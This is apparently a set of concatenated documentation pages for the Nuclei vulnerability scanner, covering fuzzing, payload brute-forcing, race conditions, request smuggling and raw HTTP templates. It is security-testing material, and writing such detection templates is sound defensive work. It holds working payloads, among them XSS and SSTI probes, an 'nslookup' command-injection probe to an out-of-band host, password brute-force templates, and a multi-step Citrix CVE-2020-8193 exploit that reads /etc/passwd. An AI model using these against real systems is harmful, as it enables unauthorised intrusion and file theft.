More complete examples are provided [here](/templates/protocols/http/basic-http-examples)
# Connection Tampering
Learn more about using HTTP pipelining and connection pooling with Nuclei
### Pipelining
HTTP Pipelining support has been added which allows multiple HTTP requests to be sent on the same connection inspired from [http-desync-attacks-request-smuggling-reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn).
Before running HTTP pipelining based templates, make sure the running target supports HTTP Pipeline connection, otherwise nuclei engine fallbacks to standard HTTP request engine.
If you want to confirm the given domain or list of subdomains supports HTTP Pipelining, [httpx](https://github.com/projectdiscovery/) has a flag `-pipeline` to do so.
An example configuring showing pipelining attributes of nuclei.
```yaml
unsafe: true
pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
```
An example template demonstrating pipelining capabilities of nuclei has been provided below-
```yaml
id: pipeline-testing
info:
name: pipeline testing
author: pdteam
severity: info
http:
- raw:
- |+
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
attack: batteringram
payloads:
path: path_wordlist.txt
unsafe: true
pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
matchers:
- type: status
part: header
status:
- 200
```
### Connection pooling
While the earlier versions of nuclei did not do connection pooling, users can now configure templates to either use HTTP connection pooling or not. This allows for faster scanning based on requirement.
To enable connection pooling in the template, `threads` attribute can be defined with respective number of threads you wanted to use in the payloads sections.
`Connection: Close` header can not be used in HTTP connection pooling template, otherwise engine will fail and fallback to standard HTTP requests with pooling.
An example template using HTTP connection pooling-
```yaml
id: fuzzing-example
info:
name: Connection pooling example
author: pdteam
severity: info
http:
- raw:
- |
GET /protected HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('admin:§password§')}}
attack: batteringram
payloads:
password: password.txt
threads: 40
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Unique string"
part: body
```
# Fuzzing Examples
Review some examples of fuzzing with Nuclei
## Basic SSTI Template
A simple template to discover `{{*}}` type SSTI vulnerabilities.
```yaml
id: fuzz-reflection-ssti
info:
name: Basic Reflection Potential SSTI Detection
author: pdteam
severity: low
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
matchers:
- type: word
part: body
words:
- "{{result}}"
```
## Basic XSS Template
A simple template to discover XSS probe reflection in HTML pages.
```yaml
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
```
## Basic OpenRedirect Template
A simple template to discover open-redirects issues.
```yaml
id: fuzz-open-redirect
info:
name: Basic Open Redirect Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "https://example.com"
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
fuzz:
- "{{redirect}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "{{redirect}}"
- type: status
status:
- 301
- 302
- 307
```
## Basic Path Based SQLi
A example template to discover path-based SQLi issues.
```yaml
http:
# pre-condition to determine if the template should be executed
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # only run if method is POST
- 'contains(path,"reset")' # only run if path contains reset word
condition: and
# fuzzing rules
fuzzing:
- part: header # This rule will be applied to the header
type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
fuzz:
X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
```
## Basic Host Header Injection
A simple template to discover host header injection issues.
```yaml
http:
# pre-condition to determine if the template should be executed
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # only run if method is POST
- 'contains(path,"reset")' # only run if path contains reset word
condition: and
# fuzzing rules
fuzzing:
- part: header # This rule will be applied to the header
type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
fuzz:
X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
```
## Blind SSRF OOB Detection
A simple template to detect Blind SSRF in known-parameters using interactsh with HTTP fuzzing.
```yaml
id: fuzz-ssrf
info:
name: Basic Blind SSRF Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
- part: query
type: replace
mode: single
keys:
- "dest"
- "redirect"
- "uri"
- "path"
- "continue"
- "url"
- "window"
- "next"
- "data"
- "reference"
- "site"
- "html"
- "val"
- "validate"
- "domain"
- "callback"
- "return"
- "page"
- "feed"
- "host"
- "port"
- "to"
- "out"
- "view"
- "dir"
- "show"
- "navigation"
- "open"
fuzz:
- "https://{{redirect}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
```
## Blind CMDi OOB based detection
A simple template to detect blind CMDI using interactsh
```yaml
id: fuzz-cmdi
info:
name: Basic Blind CMDI Detection
author: pdteam
severity: low
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
fuzz:
- "nslookup {{redirect}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
```
# Fuzzing Overview
Learn about fuzzing HTTP requests with Nuclei
Nuclei supports fuzzing of HTTP requests based on rules defined in the `fuzzing` section of the HTTP request. This allows creating templates for generic Web Application vulnerabilities like SQLi, SSRF, CMDi, etc without any information of the target like a classic web fuzzer. We call this concept as **Fuzzing for Unknown Vulnerabilities**.
## pre-condition
More often than not, we want to only attempt fuzzing on those requests where it makes sense. For example,
* Fuzz Body When Body is Present
* Ignore PreFlight and CONNECT requests
and so on. With Nuclei v3.2.4 we have introduced a new `pre-condition` section which contains conditions when the fuzzing template should be executed.
pre-condition can be considered a twin of [matchers](/templates/reference/matchers) in nuclei. They support all matcher types, including DSL, and the only difference is that this serves a different purpose.
For example, to only execute template on POST request with some body, you can use the following filter.
```yaml
- pre-condition:
- type: dsl
dsl:
- method == POST
- len(body) > 0
condition: and
```
Currently, Only request data like header, host, input, method, path, etc is available, but soon, response data will be available once the support for loading the response along with the request is added.
When writing/executing a template, you can use the -v -svd flags to see all variables available in filters before applying the filter.
### Part
Part specifies what part of the request should be fuzzed based on the specified rules. Available options for this parameter are -
**query** (`default`) - fuzz query parameters for URL
```yaml
fuzzing:
- part: query # fuzz parameters in URL query
```
**path** - fuzz path parameters for requests
```yaml
fuzzing:
- part: path # fuzz path parameters
```
**header** - fuzz header parameters for requests
```yaml
fuzzing:
- part: header # fuzz headers
```
**cookie** - fuzz cookie parameters for requests
```yaml
fuzzing:
- part: cookie # fuzz cookies
```
**body** - fuzz body parameters for requests
```yaml
fuzzing:
- part: body # fuzz parameters in body
```
### Type
Type specifies the type of replacement to perform for the fuzzing rule value. Available options for this parameter are -
1. **replace** (`default`) - replace the value with payload
2. **prefix** - prefix the value with payload
3. **postfix** - postfix the value with payload
4. **infix** - infix the value with payload (place in between)
5. **replace-regex** - replace the value with payload using regex
```yaml
fuzzing:
- part: query
type: postfix # Fuzz query and postfix payload to params
```
### Key-Value Abstraction
In a HTTP request, there are various parts like query, path, headers, cookies, and body and each part has different in various formats. For example, the query part is a key-value pair, the path part is a list of values, the body part can be a JSON, XML, or form-data.
To effectively abstract these parts and allow them to be fuzzed, Nuclei exposes these values as `key` and `value` pairs. This allows users to fuzz based on the key or value of the request part.
For example, Below sample HTTP request can be abstracted as key-value pairs as shown below.
```http
POST /reset-password?token=x0x0x0&source=app HTTP/1.1
Host: 127.0.0.1:8082
User-Agent: Go-http-client/1.1
Cookie: PHPSESSID=1234567890
Content-Length: 23
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
{"password":"12345678"}
```
* **`part: Query`**
| key | value |
| ------ | ------ |
| token | x0x0x0 |
| source | app |
* **`part: Path`**
| key | value |
| ----- | --------------- |
| value | /reset-password |
* **`part: Header`**
| key | value |
| --------------- | ------------------ |
| Host | 127.0.0.1:8082 |
| User-Agent | Go-http-client/1.1 |
| Content-Length | 23 |
| Content-Type | application/json |
| Accept-Encoding | gzip |
| Connection | close |
* **`part: Cookie`**
| key | value |
| --------- | ---------- |
| PHPSESSID | 1234567890 |
* **`part: Body`**
| key | value |
| -------- | -------- |
| password | 12345678 |
**Note:** XML, JSON, Form, Multipart-FormData will be in kv format, but if the Body is binary or in any other format, the entire Body will be represented as a single key-value pair with key as `value` and value as the entire Body.
| key | value |
| ----- | -------------------------- |
| value | "\x08\x96\x01\x12\x07\x74" |
This abstraction really levels up the game since you only need to write a single rule for the Body, and it will be applied to all formats. For example, if you check for SQLi in body values, a single rule will work on all formats, i.e., JSON, XML, Form, Multipart-FormData, etc.
### Mode
Mode specifies the mode in which to perform the replacements. Available modes are -
1. **multiple** (`default`) - replace all values at once
2. **single** - replace one value at a time
```yaml
fuzzing:
- part: query
type: postfix
mode: multiple # Fuzz query postfixing payloads to all parameters at once
```
> **Note**: default values are set/used when other options are not defined.
### Component Data Filtering
Multiple filters are supported to restrict the scope of fuzzing to only interesting parameter keys and values. Nuclei HTTP Fuzzing engine converts request parts into Keys and Values which then can be filtered by their related options.
The following filter fields are supported -
1. **keys** - list of parameter names to fuzz (exact match)
2. **keys-regex** - list of parameter regex to fuzz
3. **values** - list of value regex to fuzz
These filters can be used in combination to run highly targeted fuzzing based on the parameter input. A few examples of such filtering are provided below.
```yaml
# fuzzing command injection based on parameter name value
fuzzing:
- part: query
type: replace
mode: single
keys:
- "daemon"
- "upload"
- "dir"
- "execute"
- "download"
- "log"
- "ip"
- "cli"
- "cmd"
```
```yaml
# fuzzing openredirects based on parameter name regex
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
```
```yaml
# fuzzing ssrf based on parameter value regex
fuzzing:
- part: query
type: replace
mode: single
values:
- "https?://.*"
```
### Fuzz
Fuzz specifies the values to replace with a `type` for a parameter. It supports payloads, DSL functions, etc and allows users to fully utilize the existing nuclei feature-set for fuzzing purposes.
```yaml
# fuzz section for xss fuzzing with stop-at-first-match
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
```
```yaml
# using interactsh-url placeholder for oob testing
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
- part: query
type: replace
mode: single
keys:
- "dest"
- "redirect"
- "uri"
fuzz:
- "https://{{redirect}}"
```
```yaml
# using template-level variables for SSTI testing
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
...
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
```
## Example **Fuzzing** template
An example sample template for fuzzing XSS vulnerabilities is provided below.
```yaml
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run if method is GET
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
```
More complete examples are provided [here](/templates/protocols/http/fuzzing-examples)
# HTTP Payloads
Learn about bruteforcing HTTP requests using payloads with Nuclei
## Overview
Nuclei engine supports brute forcing any value/component of HTTP Requests using payloads module, that allows to run various type of payloads in multiple format, It's possible to define placeholders with simple keywords (or using brackets `{{helper_function(variable)}}` in case mutator functions are needed), and perform **batteringram**, **pitchfork** and **clusterbomb** attacks.
The **wordlist** for these attacks needs to be defined during the request definition under the Payload field, with a name matching the keyword, Nuclei supports both file based and in template wordlist support and Finally all DSL functionalities are fully available and supported, and can be used to manipulate the final values.
Payloads are defined using variable name and can be referenced in the request in between `{{ }}` marker.
### Difference between **HTTP Payloads** and **HTTP Fuzzing**
While both may sound similar, the major difference between **Fuzzing** and **Payloads/BruteForce** is that Fuzzing is a superset of Payloads/BruteForce and has extra features related to finding Unknown Vulnerabilities while Payloads is just plain brute forcing of values with a given attack type and set of payloads.
## Examples
An example of the using payloads with local wordlist:
```yaml
# HTTP Intruder fuzzing using local wordlist.
payloads:
paths: params.txt
header: local.txt
```
An example of the using payloads with in template wordlist support:
```yaml
# HTTP Intruder fuzzing using in template wordlist.
payloads:
password:
- admin
- guest
- password
```
**Note:** be careful while selecting attack type, as unexpected input will break the template.
For example, if you used `clusterbomb` or `pitchfork` as attack type and defined only one variable in the payload section, template will fail to compile, as `clusterbomb` or `pitchfork` expect more than one variable to use in the template.
## Attack mode
Nuclei engine supports multiple attack types, including `batteringram` as default type which generally used to fuzz single parameter, `clusterbomb` and `pitchfork` for fuzzing multiple parameters which works same as classical burp intruder.
| **Type** | batteringram | pitchfork | clusterbomb |
| ----------- | ------------ | --------- | ----------- |
| **Support** | ✔ | ✔ | ✔ |
### batteringram
The battering ram attack type places the same payload value in all positions. It uses only one payload set. It loops through the payload set and replaces all positions with the payload value.
### pitchfork
The pitchfork attack type uses one payload set for each position. It places the first payload in the first position, the second payload in the second position, and so on.
It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
### clusterbomb
The cluster bomb attack tries all different combinations of payloads. It still puts the first payload in the first position, and the second payload in the second position. But when it loops through the payload sets, it tries all combinations.
It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
This attack type is useful for a brute-force attack. Load a list of commonly used usernames in the first payload set, and a list of commonly used passwords in the second payload set. The cluster bomb attack will then try all combinations.
More details [here](https://www.sjoerdlangkemper.nl/2017/08/02/burp-intruder-attack-types/).
## Attack Mode Example
An example of the using `clusterbomb` attack to fuzz.
```yaml
http:
- raw:
- |
POST /?file={{path}} HTTP/1.1
User-Agent: {{header}}
Host: {{Hostname}}
attack: clusterbomb # Defining HTTP fuzz attack type
payloads:
path: helpers/wordlists/prams.txt
header: helpers/wordlists/header.txt
```
# HTTP Payloads Examples
Review some HTTP payload examples for Nuclei
## HTTP Intruder Bruteforcing
This template makes a defined POST request in RAW format along with in template defined payloads running `clusterbomb` intruder and checking for string match against response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
# HTTP Intruder bruteforcing with in template payload support.
http:
- raw:
- |
POST /?username=§username§¶mb=§password§ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Host: {{Hostname}}
another_header: {{base64('§password§')}}
Accept: */*
body=test
payloads:
username:
- admin
password:
- admin
- guest
- password
- test
- 12345
- 123456
attack: clusterbomb # Available: batteringram,pitchfork,clusterbomb
matchers:
- type: word
words:
- "Test is test matcher text"
```
## BruteForcing multiple requests
This template makes a defined POST request in RAW format along with wordlist based payloads running `clusterbomb` intruder and checking for string match against response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
http:
- raw:
- |
POST /?param_a=§param_a§¶mb=§param_b§ HTTP/1.1
User-Agent: §param_a§
Host: {{Hostname}}
another_header: {{base64('§param_b§')}}
Accept: */*
admin=test
- |
DELETE / HTTP/1.1
User-Agent: nuclei
Host: {{Hostname}}
{{sha256('§param_a§')}}
- |
PUT / HTTP/1.1
Host: {{Hostname}}
{{html_escape('§param_a§')}} + {{hex_encode('§param_b§'))}}
attack: clusterbomb # Available types: batteringram,pitchfork,clusterbomb
payloads:
param_a: payloads/prams.txt
param_b: payloads/paths.txt
matchers:
- type: word
words:
- "Test is test matcher text"
```
## Authenticated Bruteforcing
This template makes a subsequent HTTP requests with defined requests maintaining sessions between each request and checking for string match against response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /testing HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
testing=parameter
cookie-reuse: true # Cookie-reuse maintain the session between all request like browser.
matchers:
- type: word
words:
- "Test is test matcher text"
```
# Race Conditions
Learn about using race conditions with Nuclei
Race Conditions are another class of bugs not easily automated via traditional tooling. Burp Suite introduced a Gate mechanism to Turbo Intruder where all the bytes for all the requests are sent expect the last one at once which is only sent together for all requests synchronizing the send event.
We have implemented **Gate** mechanism in nuclei engine and allow them run via templates which makes the testing for this specific bug class simple and portable.
To enable race condition check within template, `race` attribute can be set to `true` and `race_count` defines the number of simultaneous request you want to initiate.
Below is an example template where the same request is repeated for 10 times using the gate logic.
```yaml
id: race-condition-testing
info:
name: Race condition testing
author: pdteam
severity: info
http:
- raw:
- |
POST /coupons HTTP/1.1
Host: {{Hostname}}
promo_code=20OFF
race: true
race_count: 10
matchers:
- type: status
part: header
status:
- 200
```
You can simply replace the `POST` request with any suspected vulnerable request and change the `race_count` as per your need, and it's ready to run.
```bash
nuclei -t race.yaml -target https://api.target.com
```
**Multi request race condition testing**
For the scenario when multiple requests needs to be sent in order to exploit the race condition, we can make use of threads.
```yaml
threads: 5
race: true
```
`threads` is a total number of request you wanted make with the template to perform race condition testing.
Below is an example template where multiple (5) unique request will be sent at the same time using the gate logic.
```yaml
id: multi-request-race
info:
name: Race condition testing with multiple requests
author: pd-team
severity: info
http:
- raw:
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=1
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=2
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=3
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=4
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=5
threads: 5
race: true
```
More complete examples are provided [here](/templates/protocols/http/http-race-condition-examples)
# Raw HTTP Protocol
Learn about using Raw HTTP with Nuclei
Another way to create request is using raw requests which comes with more flexibility and support of DSL helper functions, like the following ones (as of now it's suggested to leave the `Host` header as in the example with the variable `{{Hostname}}`), All the Matcher, Extractor capabilities can be used with RAW requests in same the way described above.
```yaml
http:
- raw:
- |
POST /path2/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
a=test&b=pd
```
Requests can be fine-tuned to perform the exact tasks as desired. Nuclei requests are fully configurable meaning you can configure and define each and every single thing about the requests that will be sent to the target servers.
RAW request format also supports [various helper functions](/templates/reference/helper-functions/) letting us do run time manipulation with input. An example of the using a helper function in the header.
```yaml
- raw:
- |
GET /manager/html HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('username:password')}} # Helper function to encode input at run time.
```
To make a request to the URL specified as input without any additional tampering, a blank Request URI can be used as specified below which will make the request to user specified input.
```yaml
- raw:
- |
GET HTTP/1.1
Host: {{Hostname}}
```
More complete examples are provided [here](/templates/protocols/http/raw-http-examples)
# Request Tampering
Learn about request tampering in HTTP with Nuclei
## Requests Annotation
Request inline annotations allow performing per request properties/behavior override. They are very similar to python/java class annotations and must be put on the request just before the RFC line. Currently, only the following overrides are supported:
* `@Host:` which overrides the real target of the request (usually the host/ip provided as input). It supports syntax with ip/domain, port, and scheme, for example: `domain.tld`, `domain.tld:port`, `http://domain.tld:port`
* `@tls-sni:` which overrides the SNI Name of the TLS request (usually the hostname provided as input). It supports any literals. The special value `request.host` uses the `Host` header and `interactsh-url` uses an interactsh generated URL.
* `@timeout:` which overrides the timeout for the request to a custom duration. It supports durations formatted as string. If no duration is specified, the default Timeout flag value is used.
The following example shows the annotations within a request:
```yaml
- |
@Host: https://projectdiscovery.io:443
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
```
This is particularly useful, for example, in the case of templates with multiple requests, where one request after the initial one needs to be performed to a specific host (for example, to check an API validity):
```yaml
http:
- raw:
# this request will be sent to {{Hostname}} to get the token
- |
GET /getkey HTTP/1.1
Host: {{Hostname}}
# This request will be sent instead to https://api.target.com:443 to verify the token validity
- |
@Host: https://api.target.com:443
GET /api/key={{token}} HTTP/1.1
Host: api.target.com:443
extractors:
- type: regex
name: token
part: body
regex:
# random extractor of strings between prefix and suffix
- 'prefix(.*)suffix'
matchers:
- type: word
part: body
words:
- valid token
```
Example of a custom `timeout` annotations -
```yaml
- |
@timeout: 25s
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
```
Example of `sni` annotation with `interactsh-url` -
```yaml
- |
@tls-sni: interactsh-url
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
```
## Smuggling
HTTP Smuggling is a class of Web-Attacks recently made popular by [Portswigger’s Research](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) into the topic. For an in-depth overview, please visit the article linked above.
In the open source space, detecting http smuggling is difficult particularly due to the requests for detection being malformed by nature. Nuclei is able to reliably detect HTTP Smuggling vulnerabilities utilising the [rawhttp](https://github.com/projectdiscovery/rawhttp) engine.
The most basic example of an HTTP Smuggling vulnerability is CL.TE Smuggling. An example template to detect a CE.TL HTTP Smuggling vulnerability is provided below using the `unsafe: true` attribute for rawhttp based requests.
```yaml
id: CL-TE-http-smuggling
info:
name: HTTP request smuggling, basic CL.TE vulnerability
author: pdteam
severity: info
reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
unsafe: true
matchers:
- type: word
words:
- 'Unrecognized method GPOST'
```
More complete examples are provided [here](/templates/protocols/http/http-smuggling-examples)
# Unsafe HTTP
Learn about using rawhttp or unsafe HTTP with Nuclei
Nuclei supports [rawhttp](https://github.com/projectdiscovery/rawhttp) for complete request control and customization allowing **any kind of malformed requests** for issues like HTTP request smuggling, Host header injection, CRLF with malformed characters and more.
**rawhttp** library is disabled by default and can be enabled by including `unsafe: true` in the request block.
Here is an example of HTTP request smuggling detection template using `rawhttp`.
```yaml
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked
0
GET /post?postId=5 HTTP/1.1
User-Agent: a"/>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1
- |+
GET /post?postId=5 HTTP/1.1
Host: {{Hostname}}
unsafe: true # Enables rawhttp client
matchers:
- type: dsl
dsl:
- 'contains(body, "")'
```
# Value Sharing
Learn about sharing values between HTTP requests in the HTTP template.
## HTTP Value Sharing
In Nuclei, It is possible to extract value from one HTTP request and share/reuse it in another HTTP request. This has various use-cases like login, CSRF tokens and other complex.
This concept of value sharing is possible using [Dynamic Extractors](/templates/reference/extractors#dynamic-extractor). Here's a simple example demonstrating value sharing between HTTP requests.
This template makes a subsequent HTTP requests maintaining sessions between each request, dynamically extracting data from one request and reusing them into another request using variable name and checking for string match against response.
```yaml
id: CVE-2020-8193
info:
name: Citrix unauthenticated LFI
author: pdteam
severity: high
reference: https://github.com/jas502n/CVE-2020-8193
http:
- raw:
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/xml
X-NITRO-USER: xpyZxwy6
X-NITRO-PASS: xWXHUJ56
- |
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/neo HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/stc HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
rand_key: §randkey§
- |
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
rand_key: §randkey§
cookie-reuse: true # Using cookie-reuse to maintain session between each request, same as browser.
extractors:
- type: regex
name: randkey # Variable name
part: body
internal: true
regex:
- "(?m)[0-9]{3,10}\\.[0-9]+"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
```
# JavaScript Protocol Introduction
Learn more about using JavaScript with Nuclei v3
## Introduction
Nuclei and the ProjectDiscovery community thrive on the ability to write exploits/checks in a fast and simple YAML format. We work consistently to improve our **Nuclei templates** to encourage those as the standard for writing security checks. We understand the limitations and are always working to address those, while we work on expanding our capabilities.
Nuclei currently supports writing templates for complex HTTP, DNS, SSL protocol exploits/checks through a powerful and easy to use DSL in the Nuclei engine. However, we understand the current support may not be enough for addressing vulnerabilities across all protocols and in non-remote domains of security like local privilege escalation checks, kernel etc.
To address this, Nuclei v3 includes an embedded runtime for JavaScript that is tailored for **Nuclei** with the help of **[Goja](https://github.com/dop251/goja)**.
## Features
**Support for provider or driver-specific exploits**
Some vulnerabilities are specific to software or a driver. For example, a Redis buffer overflow exploit, an exploit of specific VPN software, or exploits that are not part of the Internet Engineering Task Force (IETF) standard protocols.
Since these are not standard protocols they are not typically added to Nuclei. Detection for these types of exploits cannot be written using a 'network' protocol.
They are often very complex to write and detection for these exploits can be written by exposing the required library in Nuclei (if not already present). We now provide support for writing detection of these types of exploits with JavaScript.
**Non-network checks**
Security is not limited to network exploits. Nuclei provides support for security beyond network issues like:
* Local privilege escalation checks
* Kernel exploits
* Account misconfigurations
* System misconfigurations
**Complex network protocol exploits**
Some network exploits are very complex to write due to nature of the protocol or exploit itself. For example [CVE-2020-0796](https://nvd.nist.gov/vuln/detail/cve-2020-0796) requires you to manually construct a packet.
Detection for these exploits is usually written in Python but now can be written in JavaScript.
**Multi-step exploits**
LDAP or Kerberos exploits usually involve a multi-step process of authentication and are difficult to write in YAML-based DSL. JavaScript support makes this easier.
**Scalable and maintainable exploits**
One off exploit detection written in code are not scalable and maintainable due to nature of language, boilerplate code, and other factors. Our goal is to provide the tools to allow you to write the **minimum** code required to run detection of the exploit and let Nuclei do the rest.
**Leveraging Turing complete language**
While YAML-based DSL is powerful and easy to use it is not Turing complete and has its own limitations. Javascript is Turing complete thus users who are already familiar with JavaScript can write network and other detection of exploits without learning new DSL or hacking around existing DSL.
## Requirements
* A basic knowledge of JavaScript (loops, functions, arrays) is required to write a JavaScript protocol template
* Nuclei v3.0.0 or above
# null
# Namespace: bytes
## Table of contents
### Classes
* [Buffer](/templates/protocols/javascript/modules/bytes.Buffer)
# null
# Namespace: fs
## Table of contents
### Functions
* [ListDir](/templates/protocols/javascript/modules/fs#listdir)
* [ReadFile](/templates/protocols/javascript/modules/fs#readfile)
* [ReadFileAsString](/templates/protocols/javascript/modules/fs#readfileasstring)
* [ReadFilesFromDir](/templates/protocols/javascript/modules/fs#readfilesfromdir)
## Functions
### ListDir
▸ **ListDir**(`path`, `itemType`): `string`\[] | `null`
ListDir lists itemType values within a directory
depending on the itemType provided
